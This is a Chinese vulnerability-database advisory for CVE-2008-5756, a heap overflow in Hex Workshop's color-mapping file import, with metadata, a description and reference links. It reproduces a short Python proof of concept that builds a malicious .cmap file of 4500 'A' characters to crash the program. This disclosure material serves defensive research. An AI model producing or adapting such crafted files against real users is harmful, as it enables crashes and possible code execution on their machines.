Hex Workshop CMAP文件处理堆溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117145 漏洞类型 缓冲区溢出
发布时间 2008-12-28 更新时间 2009-01-29
CVE编号 CVE-2008-5756 CNNVD-ID CNNVD-200812-479
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7592
https://cxsecurity.com/issue/WLB-2009010103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-479
|漏洞详情
HexWorkshop是BreakPoint公司的一款十六进制编辑器,它能够处理十六进制编辑、插入、填充、删除等操作。如果用户使用HexWorkshop打开了包含有超长16进制序列的恶意颜色映射(CMAP)文件的话,就可能触发堆溢出,导致执行任意指令。
|漏洞EXP
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected 
# 
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^

chars = "A"*4500

foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()

# milw0rm.com [2008-12-28]
|参考资料

来源:XF
名称:hexworkshop-cmap-bo(47630)
链接:http://xforce.iss.net/xforce/xfdb/47630
来源:BID
名称:33023
链接:http://www.securityfocus.com/bid/33023
来源:MILW0RM
名称:7592
链接:http://www.milw0rm.com/exploits/7592
来源:VUPEN
名称:ADV-2008-3519
链接:http://www.frsirt.com/english/advisories/2008/3519
来源:SREASON
名称:4838
链接:http://securityreason.com/securityalert/4838
来源:SECUNIA
名称:33327
链接:http://secunia.com/advisories/33327